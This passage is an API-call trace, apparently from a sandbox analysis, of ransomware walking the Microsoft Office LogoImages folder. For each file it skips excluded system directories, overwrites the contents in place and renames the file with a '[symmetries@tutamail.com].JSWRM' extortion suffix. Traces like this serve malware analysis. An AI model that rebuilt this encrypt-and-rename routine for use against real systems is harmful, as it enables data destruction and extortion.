dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x241380, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.978] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2019) returned 1 [0133.978] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.978] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.980] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.980] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.980] CloseHandle (hObject=0x238) returned 1 [0133.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x901, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.scale-140.png", cAlternateFileName="VIF275~1.PNG")) returned 1 [0133.981] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.981] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="recovery") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="perflogs") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="system volume information") returned 1 [0133.982] lstrcmpiW (lpString1="VisioLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.983] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2305) returned 1 [0133.983] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.983] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x900, lpOverlapped=0x0) returned 1 [0133.985] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.985] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x900, lpOverlapped=0x0) returned 1 [0133.985] CloseHandle (hObject=0x238) returned 1 [0133.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.986] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.scale-180.png", cAlternateFileName="VI3544~1.PNG")) returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="recovery") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="perflogs") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.986] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.987] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="system volume information") returned 1 [0133.987] lstrcmpiW (lpString1="VisioLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.987] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3288) returned 1 [0133.988] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.988] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0133.990] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.990] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0133.990] CloseHandle (hObject=0x238) returned 1 [0133.990] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.991] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6d8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.scale-80.png", cAlternateFileName="VIA6C1~1.PNG")) returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="recovery") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="perflogs") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="system volume information") returned 1 [0133.991] lstrcmpiW (lpString1="VisioLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x241100, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.992] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1752) returned 1 [0133.993] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.993] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6d0, lpOverlapped=0x0) returned 1 [0133.994] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.994] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6d0, lpOverlapped=0x0) returned 1 [0133.994] CloseHandle (hObject=0x238) returned 1 [0133.994] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.995] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8eb, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-black_scale-100.png", cAlternateFileName="WINPRO~3.PNG")) returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="windows") returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0133.995] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0133.996] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.996] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.996] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0133.996] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.997] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2283) returned 1 [0133.997] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.997] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0133.998] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.998] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0133.999] CloseHandle (hObject=0x238) returned 1 [0133.999] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.000] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc49, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-black_scale-140.png", cAlternateFileName="WINPRO~1.PNG")) returned 1 [0134.000] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0134.000] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0134.000] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0134.000] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="windows") returned 1 [0134.000] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0134.001] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0134.001] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0134.001] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.001] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0134.001] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 